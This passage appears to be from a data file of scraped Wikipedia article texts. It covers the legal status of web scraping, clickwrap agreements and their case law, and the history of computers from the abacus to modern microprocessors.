Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
596 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Clickwrap | A clickwrap or clickthrough agreement is a prompt that offers individuals the opportunity to accept or decline a digitally-mediated policy. 1 2 Privacy policies, terms of service and other user policies, as well as copyright policies commonly employ the clickwrap prompt. Clickwraps are common in signup processes for social media services like Facebook, Twitter or Tumblr, connections to wireless networks operated in corporate spaces, as part of the installation processes of many software packages, and in other circumstances where agreement is sought using digital media. The name "clickwrap" is derived from the use of "shrink wrap contracts" commonly used in boxed software purchases, which "contain a notice that by tearing open the shrinkwrap, the user assents to the software terms enclosed within". 3 The content and form of clickwrap agreements vary widely. Most clickwrap agreements require the end-user to indicate their assent by clicking an "ok" or "agree" button on a dialog box or pop-up window. A user indicates rejection by clicking cancel or closing the window. If the user opts to reject the terms, they cannot use or purchase the product or service. Classically, such a take-it-or-leave-it contract is described as a "contract of adhesion, which is a contract that lacks bargaining power, forcing one party to be favored over the other. The terms of service or license do not always appear on the same webpage or window, but are always accessible before acceptance, such as through a hyperlink embedded in the product's webpage or a pop-up screen prior to installation. In order to be deemed to have accepted the terms of service, the purchaser must be put on notice that certain terms of service may apply. If the terms of service are not visible and or accessible, courts have found the notice requirement to be lacking and as such, the purchaser may not be bound to the terms of the agreement. An analysis of the terms of service of major consumer websites has found that they frequently contain clauses that impede consumer rights in substantial and often unexpected ways. 4 Few cases have considered the validity of clickwrap licenses. Still, in the cases that have challenged their validity, the terms of the contract have usually been upheld: Even though courts have ruled some clickwrap licenses to be enforceable contracts, it does not follow that every term of every clickwrap license is enforceable. Clickwrap licenses must still meet the criteria for enforceability of a unilateral form contract. For example, see Bragg v. Linden Research, Inc., 487 F.Supp.2d 593 (E.D. Pa. 2007), in which the judge found certain aspects of the Second Life clickwrap agreement "unconscionable, and therefore unenforceable". 1 In Register.com, Inc. v. Verio, Inc., 356 F.3d 393 (2d. Cir. 2004), the court described a clickwrap license, even though the license in question was distinguished from a clickwrap license Essentially, under a clickwrap arrangement, potential licensees are presented with the proposed license terms and forced to expressly and unambiguously manifest either assent or rejection prior to being given access to the product. An earlier case, Specht v. Netscape Communications Corp., 150 F.Supp.2d 585 (S.D.N.Y. 2001), aff'd, 306 F.3d 17 (2d. Cir. 2002), gave perhaps the clearest definition of a clickwrap license. A click-wrap license presents the user with a message on his or her computer screen, requiring that the user manifest his or her assent to the terms of the license agreement by clicking on an icon. n12 The product cannot be obtained or used unless and until the icon is clicked. For example, when a user attempts to obtain Netscape's Communicator or Navigator, a web page appears containing the full text of the Communicator Navigator license agreement. Plainly visible on the screen is the query, "Do you accept all the terms of the preceding license agreement? If so, click on the Yes button. If you select No, Setup will close. Below this text are three button or icons: one labeled "Back" and used to return to an earlier step of the download preparation; one labeled "No, which if clicked, terminates the download; and one labeled "Yes, which if clicked, allows the download to proceed. Unless the user clicks "Yes, indicating his or her assent to the license agreement, the user cannot obtain the software. The clickwrap method was presented to the court in ProCD v. Zeidenberg, 86 F.3d 1447 (7th Cir. 1996), where Zeidenberg purchased a CD-ROM, created by ProCD, which contained a compilation of a telephone directory database. Upon purchase of this CD-ROM, Zeidenberg installed the software onto his computer then created a website which offered to visitors the information contained on the CD-ROM at a price less than what ProCD charged for the software. Prior to his purchase of the software, Zeidenberg may not have been aware of any prohibited use or dissemination of the product without consent by ProCD. However, upon preparing to install the software onto his computer, the software license appeared on his computer screen and would not allow him to continue with the installation without indicating acceptance by clicking his assent in a dialog box. The court held that Zeidenberg did accept the offer and the terms contained within the license by clicking through the dialog box. Zeidenberg had the opportunity to read the terms of the license prior to clicking the acceptance box. The court further stated that Zeidenberg could have rejected the terms of the contract and returned the software. (Id.). 6 7 More recently, in the 2017 opinion Meyer v. Uber Technologies, the Second Circuit of the United States Court of Appeal held that users were on fair notice of the arbitration provision in Uber's registration process, because Uber presented the app's terms of service via hyperlink. "While it may be the case that many users will not bother reading the additional terms, that is the choice the user makes, Judge Chin wrote. "The user is still on inquiry notice. The Court further held that w hen considering the perspective of a reasonable smartphone user, we need not presume that the user has never before encountered an app or entered into a contract using a smartphone... Instead, the Court explained that a reasonable user would know that by clicking the registration button, he was agreeing to the terms and conditions accessible via the hyperlink, whether he clicked on the hyperlink or not. 8 9 On 21 May 2015, the European Court of Justice decided in the case of El Majdoub v. CarsOnTheWeb.Deutschland GmbH (case n C 322 14), on a referral from a German court, 10 that click-wrap agreements are acceptable under certain circumstances as a "durable record" of the acceptance of general conditions within the meaning of Regulation 44 2001 (now replaced by Regulation 1215 2012, also known as the 'Brussels I Recast Regulation'). 11 Clickwraps have been shown to have an agenda-setting function, wherein aspects of clickwraps like prominent join buttons are easier to notice than the links to the privacy policies. 12 YouTube Video: The Clickwrap and The Biggest Lie on the Internet |
597 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computers | A computer is a machine that can be programmed to automatically carry out sequences of arithmetic or logical operations (computation). Modern digital electronic computers can perform generic sets of operations known as programs. These programs enable computers to perform a wide range of tasks. The term computer system may refer to a nominally complete computer that includes the hardware, operating system, software, and peripheral equipment needed and used for full operation; or to a group of computers that are linked and function together, such as a computer network or computer cluster. A broad range of industrial and consumer products use computers as control systems, including simple special-purpose devices like microwave ovens and remote controls, and factory devices like industrial robots. Computers are at the core of general-purpose devices such as personal computers and mobile devices such as smartphones. Computers power the Internet, which links billions of computers and users. Early computers were meant to be used only for calculations. Simple manual instruments like the abacus have aided people in doing calculations since ancient times. Early in the Industrial Revolution, some mechanical devices were built to automate long, tedious tasks, such as guiding patterns for looms. More sophisticated electrical machines did specialized analog calculations in the early 20th century. The first digital electronic calculating machines were developed during World War II, both electromechanical and using thermionic valves. The first semiconductor transistors in the late 1940s were followed by the silicon-based MOSFET (MOS transistor) and monolithic integrated circuit chip technologies in the late 1950s, leading to the microprocessor and the microcomputer revolution in the 1970s. The speed, power, and versatility of computers have been increasing dramatically ever since then, with transistor counts increasing at a rapid pace (Moore's law noted that counts doubled every two years), leading to the Digital Revolution during the late 20th and early 21st centuries. Conventionally, a modern computer consists of at least one processing element, typically a central processing unit (CPU) in the form of a microprocessor, together with some type of computer memory, typically semiconductor memory chips. The processing element carries out arithmetic and logical operations, and a sequencing and control unit can change the order of operations in response to stored information. Peripheral devices include input devices (keyboards, mice, joystick, etc.), output devices (monitor screens, printers, etc.), and input output devices that perform both functions (e.g., the 2000s-era touchscreen). Peripheral devices allow information to be retrieved from an external source, and they enable the results of operations to be saved and retrieved. It was not until the mid 20th century that the word acquired its modern definition; according to the Oxford English Dictionary, the first known use of the word computer was in a different sense, in a 1613 book called The Yong Mans Gleanings by the English writer Richard Brathwait: "I haue sic read the truest computer of Times, and the best Arithmetician that euer sic breathed, and he reduceth thy dayes into a short number. This usage of the term referred to a human computer, a person who carried out calculations or computations. The word continued to have the same meaning until the middle of the 20th century. During the latter part of this period, women were often hired as computers because they could be paid less than their male counterparts. 1 By 1943, most human computers were women. 2 The Online Etymology Dictionary gives the first attested use of computer in the 1640s, meaning 'one who calculates'; this is an "agent noun from compute (v.) . The Online Etymology Dictionary states that the use of the term to mean 'calculating machine' (of any type) is from 1897. The Online Etymology Dictionary indicates that the "modern use" of the term, to mean 'programmable digital electronic computer' dates from "1945 under this name; in a theoretical sense from 1937, as Turing machine". 3 The name has remained, although modern computers are capable of many higher-level functions. Devices have been used to aid computation for thousands of years, mostly using one-to-one correspondence with fingers. The earliest counting device was most likely a form of tally stick. Later record keeping aids throughout the Fertile Crescent included calculi (clay spheres, cones, etc.) which represented counts of items, likely livestock or grains, sealed in hollow unbaked clay containers. a 4 The use of counting rods is one example. The abacus was initially used for arithmetic tasks. The Roman abacus was developed from devices used in Babylonia as early as 2400 BCE. Since then, many other forms of reckoning boards or tables have been invented. In a medieval European counting house, a checkered cloth would be placed on a table, and markers moved around on it according to certain rules, as an aid to calculating sums of money. 5 The Antikythera mechanism is believed to be the earliest known mechanical analog computer, according to Derek J. de Solla Price. 6 It was designed to calculate astronomical positions. It was discovered in 1901 in the Antikythera wreck off the Greek island of Antikythera, between Kythera and Crete, and has been dated to approximately c. 100 BCE. Devices of comparable complexity to the Antikythera mechanism would not reappear until the fourteenth century. 7 Many mechanical aids to calculation and measurement were constructed for astronomical and navigation use. The planisphere was a star chart invented by Ab Rayh n al-B r n in the early 11th century. 8 The astrolabe was invented in the Hellenistic world in either the 1st or 2nd centuries BCE and is often attributed to Hipparchus. A combination of the planisphere and dioptra, the astrolabe was effectively an analog computer capable of working out several different kinds of problems in spherical astronomy. An astrolabe incorporating a mechanical calendar computer 9 10 and gear-wheels was invented by Abi Bakr of Isfahan, Persia in 1235. 11 Ab Rayh n al-B r n invented the first mechanical geared lunisolar calendar astrolabe, 12 an early fixed-wired knowledge processing machine 13 with a gear train and gear-wheels, 14 c. 1000 AD. The sector, a calculating instrument used for solving problems in proportion, trigonometry, multiplication and division, and for various functions, such as squares and cube roots, was developed in the late 16th century and found application in gunnery, surveying and navigation. The planimeter was a manual instrument to calculate the area of a closed figure by tracing over it with a mechanical linkage. The slide rule was invented around 1620 1630, by the English clergyman William Oughtred, shortly after the publication of the concept of the logarithm. It is a hand-operated analog computer for doing multiplication and division. As slide rule development progressed, added scales provided reciprocals, squares and square roots, cubes and cube roots, as well as transcendental functions such as logarithms and exponentials, circular and hyperbolic trigonometry and other functions. Slide rules with special scales are still used for quick performance of routine calculations, such as the E6B circular slide rule used for time and distance calculations on light aircraft. In the 1770s, Pierre Jaquet-Droz, a Swiss watchmaker, built a mechanical doll (automaton) that could write holding a quill pen. By switching the number and order of its internal wheels different letters, and hence different messages, could be produced. In effect, it could be mechanically "programmed" to read instructions. Along with two other complex machines, the doll is at the Mus e d'Art et d'Histoire of Neuch tel, Switzerland, and still operates. 15 In 1831 1835, mathematician and engineer Giovanni Plana devised a Perpetual Calendar machine, which, through a system of pulleys and cylinders and over, could predict the perpetual calendar for every year from 0 CE (that is, 1 BCE) to 4000 CE, keeping track of leap years and varying day length. The tide-predicting machine invented by the Scottish scientist Sir William Thomson in 1872 was of great utility to navigation in shallow waters. It used a system of pulleys and wires to automatically calculate predicted tide levels for a set period at a particular location. The differential analyser, a mechanical analog computer designed to solve differential equations by integration, used wheel-and-disc mechanisms to perform the integration. In 1876, Sir William Thomson had already discussed the possible construction of such calculators, but he had been stymied by the limited output torque of the ball-and-disk integrators. 16 In a differential analyzer, the output of one integrator drove the input of the next integrator, or a graphing output. The torque amplifier was the advance that allowed these machines to work. Starting in the 1920s, Vannevar Bush and others developed mechanical differential analyzers. In the 1890s, the Spanish engineer Leonardo Torres Quevedo began to develop a series of advanced analog machines that could solve real and complex roots of polynomials, 17 18 19 20 which were published in 1901 by the Paris Academy of Sciences. 21 Charles Babbage, an English mechanical engineer and polymath, originated the concept of a programmable computer. Considered the "father of the computer", 22 he conceptualized and invented the first mechanical computer in the early 19th century. After working on his difference engine he announced his invention in 1822, in a paper to the Royal Astronomical Society, titled "Note on the application of machinery to the computation of astronomical and mathematical tables", 23 he also designed to aid in navigational calculations, in 1833 he realized that a much more general design, an analytical engine, was possible. The input of programs and data was to be provided to the machine via punched cards, a method being used at the time to direct mechanical looms such as the Jacquard loom. For output, the machine would have a printer, a curve plotter and a bell. The machine would also be able to punch numbers onto cards to be read in later. The engine would incorporate an arithmetic logic unit, control flow in the form of conditional branching and loops, and integrated memory, making it the first design for a general-purpose computer that could be described in modern terms as Turing-complete. 24 25 The machine was about a century ahead of its time. All the parts for his machine had to be made by hand this was a major problem for a device with thousands of parts. Eventually, the project was dissolved with the decision of the British Government to cease funding. Babbage's failure to complete the analytical engine can be chiefly attributed to political and financial difficulties as well as his desire to develop an increasingly sophisticated computer and to move ahead faster than anyone else could follow. Nevertheless, his son, Henry Babbage, completed a simplified version of the analytical engine's computing unit (the mill) in 1888. He gave a successful demonstration of its use in computing tables in 1906. In his work Essays on Automatics published in 1914, Leonardo Torres Quevedo wrote a brief history of Babbage's efforts at constructing a mechanical Difference Engine and Analytical Engine. The paper contains a design of a machine capable to calculate formulas like a x ( y z ) 2 displaystyle a x (y-z) 2 , for a sequence of sets of values. The whole machine was to be controlled by a read-only program, which was complete with provisions for conditional branching. He also introduced the idea of floating-point arithmetic. 26 27 28 In 1920, to celebrate the 100th anniversary of the invention of the arithmometer, Torres presented in Paris the Electromechanical Arithmometer, which allowed a user to input arithmetic problems through a keyboard, and computed and printed the results, 29 30 31 32 demonstrating the feasibility of an electromechanical analytical engine. 33 During the first half of the 20th century, many scientific computing needs were met by increasingly sophisticated analog computers, which used a direct mechanical or electrical model of the problem as a basis for computation. However, these were not programmable and generally lacked the versatility and accuracy of modern digital computers. 34 The first modern analog computer was a tide-predicting machine, invented by Sir William Thomson (later to become Lord Kelvin) in 1872. The differential analyser, a mechanical analog computer designed to solve differential equations by integration using wheel-and-disc mechanisms, was conceptualized in 1876 by James Thomson, the elder brother of the more famous Sir William Thomson. 16 The art of mechanical analog computing reached its zenith with the differential analyzer, built by H. L. Hazen and Vannevar Bush at MIT starting in 1927. This built on the mechanical integrators of James Thomson and the torque amplifiers invented by H. W. Nieman. A dozen of these devices were built before their obsolescence became obvious. By the 1950s, the success of digital electronic computers had spelled the end for most analog computing machines, but analog computers remained in use during the 1950s in some specialized applications such as education (slide rule) and aircraft (control systems). By 1938, the United States Navy had developed an electromechanical analog computer small enough to use aboard a submarine. This was the Torpedo Data Computer, which used trigonometry to solve the problem of firing a torpedo at a moving target. During World War II similar devices were developed in other countries as well. Early digital computers were electromechanical; electric switches drove mechanical relays to perform the calculation. These devices had a low operating speed and were eventually superseded by much faster all-electric computers, originally using vacuum tubes. The Z2, created by German engineer Konrad Zuse in 1939 in Berlin, was one of the earliest examples of an electromechanical relay computer. 35 In 1941, Zuse followed his earlier machine up with the Z3, the world's first working electromechanical programmable, fully automatic digital computer. 38 39 The Z3 was built with 2000 relays, implementing a 22 bit word length that operated at a clock frequency of about 5 10 Hz. 40 Program code was supplied on punched film while data could be stored in 64 words of memory or supplied from the keyboard. It was quite similar to modern machines in some respects, pioneering numerous advances such as floating-point numbers. Rather than the harder-to-implement decimal system (used in Charles Babbage's earlier design), using a binary system meant that Zuse's machines were easier to build and potentially more reliable, given the technologies available at that time. 41 The Z3 was not itself a universal computer but could be extended to be Turing complete. 42 43 Zuse's next computer, the Z4, became the world's first commercial computer; after initial delay due to the Second World War, it was completed in 1950 and delivered to the ETH Zurich. 44 The computer was manufactured by Zuse's own company, Zuse KG, which was founded in 1941 as the first company with the sole purpose of developing computers in Berlin. 44 Purely electronic circuit elements soon replaced their mechanical and electromechanical equivalents, at the same time that digital calculation replaced analog. The engineer Tommy Flowers, working at the Post Office Research Station in London in the 1930s, began to explore the possible use of electronics for the telephone exchange. Experimental equipment that he built in 1934 went into operation five years later, converting a portion of the telephone exchange network into an electronic data processing system, using thousands of vacuum tubes. 34 In the US, John Vincent Atanasoff and Clifford E. Berry of Iowa State University developed and tested the Atanasoff Berry Computer (ABC) in 1942, 45 the first "automatic electronic digital computer". 46 This design was also all-electronic and used about 300 vacuum tubes, with capacitors fixed in a mechanically rotating drum for memory. 47 During World War II, the British code-breakers at Bletchley Park achieved a number of successes at breaking encrypted German military communications. The German encryption machine, Enigma, was first attacked with the help of the electro-mechanical bombes which were often run by women. 48 49 To crack the more sophisticated German Lorenz SZ 40 42 machine, used for high-level Army communications, Max Newman and his colleagues commissioned Flowers to build the Colossus. 47 He spent eleven months from early February 1943 designing and building the first Colossus. 50 After a functional test in December 1943, Colossus was shipped to Bletchley Park, where it was delivered on 18 January 1944 51 and attacked its first message on 5 February. 47 Colossus was the world's first electronic digital programmable computer. 34 It used a large number of valves (vacuum tubes). It had paper-tape input and was capable of being configured to perform a variety of boolean logical operations on its data, but it was not Turing-complete. Nine Mk II Colossi were built (The Mk I was converted to a Mk II making ten machines in total). Colossus Mark I contained 1,500 thermionic valves (tubes), but Mark II with 2,400 valves, was both five times faster and simpler to operate than Mark I, greatly speeding the decoding process. 52 53 The ENIAC 54 (Electronic Numerical Integrator and Computer) was the first electronic programmable computer built in the U.S. Although the ENIAC was similar to the Colossus, it was much faster, more flexible, and it was Turing-complete. Like the Colossus, a "program" on the ENIAC was defined by the states of its patch cables and switches, a far cry from the stored program electronic machines that came later. Once a program was written, it had to be mechanically set into the machine with manual resetting of plugs and switches. The programmers of the ENIAC were six women, often known collectively as the "ENIAC girls". 55 56 It combined the high speed of electronics with the ability to be programmed for many complex problems. It could add or subtract 5000 times a second, a thousand times faster than any other machine. It also had modules to multiply, divide, and square root. High speed memory was limited to 20 words (about 80 bytes). Built under the direction of John Mauchly and J. Presper Eckert at the University of Pennsylvania, ENIAC's development and construction lasted from 1943 to full operation at the end of 1945. The machine was huge, weighing 30 tons, using 200 kilowatts of electric power and contained over 18,000 vacuum tubes, 1,500 relays, and hundreds of thousands of resistors, capacitors, and inductors. 57 The principle of the modern computer was proposed by Alan Turing in his seminal 1936 paper, 58 On Computable Numbers. Turing proposed a simple device that he called "Universal Computing machine" and that is now known as a universal Turing machine. He proved that such a machine is capable of computing anything that is computable by executing instructions (program) stored on tape, allowing the machine to be programmable. The fundamental concept of Turing's design is the stored program, where all the instructions for computing are stored in memory. Von Neumann acknowledged that the central concept of the modern computer was due to this paper. 59 Turing machines are to this day a central object of study in theory of computation. Except for the limitations imposed by their finite memory stores, modern computers are said to be Turing-complete, which is to say, they have algorithm execution capability equivalent to a universal Turing machine. Early computing machines had fixed programs. Changing its function required the re-wiring and re-structuring of the machine. 47 With the proposal of the stored-program computer this changed. A stored-program computer includes by design an instruction set and can store in memory a set of instructions (a program) that details the computation. The theoretical basis for the stored-program computer was laid out by Alan Turing in his 1936 paper. In 1945, Turing joined the National Physical Laboratory and began work on developing an electronic stored-program digital computer. His 1945 report "Proposed Electronic Calculator" was the first specification for such a device. John von Neumann at the University of Pennsylvania also circulated his First Draft of a Report on the EDVAC in 1945. 34 The Manchester Baby was the world's first stored-program computer. It was built at the University of Manchester in England by Frederic C. Williams, Tom Kilburn and Geoff Tootill, and ran its first program on 21 June 1948. 60 It was designed as a testbed for the Williams tube, the first random-access digital storage device. 61 Although the computer was described as "small and primitive" by a 1998 retrospective, it was the first working machine to contain all of the elements essential to a modern electronic computer. 62 As soon as the Baby had demonstrated the feasibility of its design, a project began at the university to develop it into a practically useful computer, the Manchester Mark 1. The Mark 1 in turn quickly became the prototype for the Ferranti Mark 1, the world's first commercially available general-purpose computer. 63 Built by Ferranti, it was delivered to the University of Manchester in February 1951. At least seven of these later machines were delivered between 1953 and 1957, one of them to Shell labs in Amsterdam. 64 In October 1947 the directors of British catering company J. Lyons Company decided to take an active role in promoting the commercial development of computers. Lyons's LEO I computer, modelled closely on the Cambridge EDSAC of 1949, became operational in April 1951 65 and ran the world's first routine office computer job. The concept of a field-effect transistor was proposed by Julius Edgar Lilienfeld in 1925. John Bardeen and Walter Brattain, while working under William Shockley at Bell Labs, built the first working transistor, the point-contact transistor, in 1947, which was followed by Shockley's bipolar junction transistor in 1948. 66 67 From 1955 onwards, transistors replaced vacuum tubes in computer designs, giving rise to the "second generation" of computers. Compared to vacuum tubes, transistors have many advantages: they are smaller, and require less power than vacuum tubes, so give off less heat. Junction transistors were much more reliable than vacuum tubes and had longer, indefinite, service life. Transistorized computers could contain tens of thousands of binary logic circuits in a relatively compact space. However, early junction transistors were relatively bulky devices that were difficult to manufacture on a mass-production basis, which limited them to a number of specialized applications. 68 At the University of Manchester, a team under the leadership of Tom Kilburn designed and built a machine using the newly developed transistors instead of valves. 69 Their first transistorized computer and the first in the world, was operational by 1953, and a second version was completed there in April 1955. However, the machine did make use of valves to generate its 125 kHz clock waveforms and in the circuitry to read and write on its magnetic drum memory, so it was not the first completely transistorized computer. That distinction goes to the Harwell CADET of 1955, 70 built by the electronics division of the Atomic Energy Research Establishment at Harwell. 70 71 The metal oxide silicon field-effect transistor (MOSFET), also known as the MOS transistor, was invented by Mohamed M. Atalla and Dawon Kahng at Bell Labs in 1959. 72 It was the first truly compact transistor that could be miniaturized and mass-produced for a wide range of uses. 68 With its high scalability, 73 and much lower power consumption and higher density than bipolar junction transistors, 74 the MOSFET made it possible to build high-density integrated circuits. 75 76 In addition to data processing, it also enabled the practical use of MOS transistors as memory cell storage elements, leading to the development of MOS semiconductor memory, which replaced earlier magnetic-core memory in computers. The MOSFET led to the microcomputer revolution, 77 and became the driving force behind the computer revolution. 78 79 The MOSFET is the most widely used transistor in computers, 80 81 and is the fundamental building block of digital electronics. 82 The next great advance in computing power came with the advent of the integrated circuit (IC). The idea of the integrated circuit was first conceived by a radar scientist working for the Royal Radar Establishment of the Ministry of Defence, Geoffrey W.A. Dummer. Dummer presented the first public description of an integrated circuit at the Symposium on Progress in Quality Electronic Components in Washington, D.C., on 7 May 1952. 83 The first working ICs were invented by Jack Kilby at Texas Instruments and Robert Noyce at Fairchild Semiconductor. 84 Kilby recorded his initial ideas concerning the integrated circuit in July 1958, successfully demonstrating the first working integrated example on 12 September 1958. 85 In his patent application of 6 February 1959, Kilby described his new device as "a body of semiconductor material ... wherein all the components of the electronic circuit are completely integrated". 86 87 However, Kilby's invention was a hybrid integrated circuit (hybrid IC), rather than a monolithic integrated circuit (IC) chip. 88 Kilby's IC had external wire connections, which made it difficult to mass-produce. 89 Noyce also came up with his own idea of an integrated circuit half a year later than Kilby. 90 Noyce's invention was the first true monolithic IC chip. 91 89 His chip solved many practical problems that Kilby's had not. Produced at Fairchild Semiconductor, it was made of silicon, whereas Kilby's chip was made of germanium. Noyce's monolithic IC was fabricated using the planar process, developed by his colleague Jean Hoerni in early 1959. In turn, the planar process was based on Mohamed M. Atalla's work on semiconductor surface passivation by silicon dioxide in the late 1950s. 92 93 94 Modern monolithic ICs are predominantly MOS (metal oxide semiconductor) integrated circuits, built from MOSFETs (MOS transistors). 95 The earliest experimental MOS IC to be fabricated was a 16 transistor chip built by Fred Heiman and Steven Hofstein at RCA in 1962. 96 General Microelectronics later introduced the first commercial MOS IC in 1964, 97 developed by Robert Norman. 96 Following the development of the self-aligned gate (silicon-gate) MOS transistor by Robert Kerwin, Donald Klein and John Sarace at Bell Labs in 1967, the first silicon-gate MOS IC with self-aligned gates was developed by Federico Faggin at Fairchild Semiconductor in 1968. 98 The MOSFET has since become the most critical device component in modern ICs. 95 The development of the MOS integrated circuit led to the invention of the microprocessor, 99 100 and heralded an explosion in the commercial and personal use of computers. While the subject of exactly which device was the first microprocessor is contentious, partly due to lack of agreement on the exact definition of the term "microprocessor", it is largely undisputed that the first single-chip microprocessor was the Intel 4004, 101 designed and realized by Federico Faggin with his silicon-gate MOS IC technology, 99 along with Ted Hoff, Masatoshi Shima and Stanley Mazor at Intel. b 103 In the early 1970s, MOS IC technology enabled the integration of more than 10,000 transistors on a single chip. 76 System on a Chip (SoCs) are complete computers on a microchip (or chip) the size of a coin. 104 They may or may not have integrated RAM and flash memory. If not integrated, the RAM is usually placed directly above (known as Package on package) or below (on the opposite side of the circuit board) the SoC, and the flash memory is usually placed right next to the SoC, this all done to improve data transfer speeds, as the data signals do not have to travel long distances. Since ENIAC in 1945, computers have advanced enormously, with modern SoCs (Such as the Snapdragon 865) being the size of a coin while also being hundreds of thousands of times more powerful than ENIAC, integrating billions of transistors, and consuming only a few watts of power. The first mobile computers were heavy and ran from mains power. The 50 lb (23 kg) IBM 5100 was an early example. Later portables such as the Osborne 1 and Compaq Portable were considerably lighter but still needed to be plugged in. The first laptops, such as the Grid Compass, removed this requirement by incorporating batteries and with the continued miniaturization of computing resources and advancements in portable battery life, portable computers grew in popularity in the 2000s. 105 The same developments allowed manufacturers to integrate computing resources into cellular mobile phones by the early 2000s. These smartphones and tablets run on a variety of operating systems and recently became the dominant computing device on the market. 106 These are powered by System on a Chip (SoCs), which are complete computers on a microchip the size of a coin. 104 Computers can be classified in a number of different ways, including: The term hardware covers all of those parts of a computer that are tangible physical objects. Circuits, computer chips, graphic cards, sound cards, memory (RAM), motherboard, displays, power supplies, cables, keyboards, printers and "mice" input devices are all hardware. A general-purpose computer has four main components: the arithmetic logic unit (ALU), the control unit, the memory, and the input and output devices (collectively termed I O). These parts are interconnected by buses, often made of groups of wires. Inside each of these parts are thousands to trillions of small electrical circuits which can be turned off or on by means of an electronic switch. Each circuit represents a bit (binary digit) of information so that when the circuit is on it represents a "1", and when off it represents a "0" (in positive logic representation). The circuits are arranged in logic gates so that one or more of the circuits may control the state of one or more of the other circuits. When unprocessed data is sent to the computer with the help of input devices, the data is processed and sent to output devices. The input devices may be hand-operated or automated. The act of processing is mainly regulated by the CPU. Some examples of input devices are: The means through which computer gives output are known as output devices. Some examples of output devices are: The control unit (often called a control system or central controller) manages the computer's various components; it reads and interprets (decodes) the program instructions, transforming them into control signals that activate other parts of the computer. d Control systems in advanced computers may change the order of execution of some instructions to improve performance. A key component common to all CPUs is the program counter, a special memory cell (a register) that keeps track of which location in memory the next instruction is to be read from. e The control system's function is as follows— this is a simplified description, and some of these steps may be performed concurrently or in a different order depending on the type of CPU: Since the program counter is (conceptually) just another set of memory cells, it can be changed by calculations done in the ALU. Adding 100 to the program counter would cause the next instruction to be read from a place 100 locations further down the program. Instructions that modify the program counter are often known as "jumps" and allow for loops (instructions that are repeated by the computer) and often conditional instruction execution (both examples of control flow). The sequence of operations that the control unit goes through to process an instruction is in itself like a short computer program, and 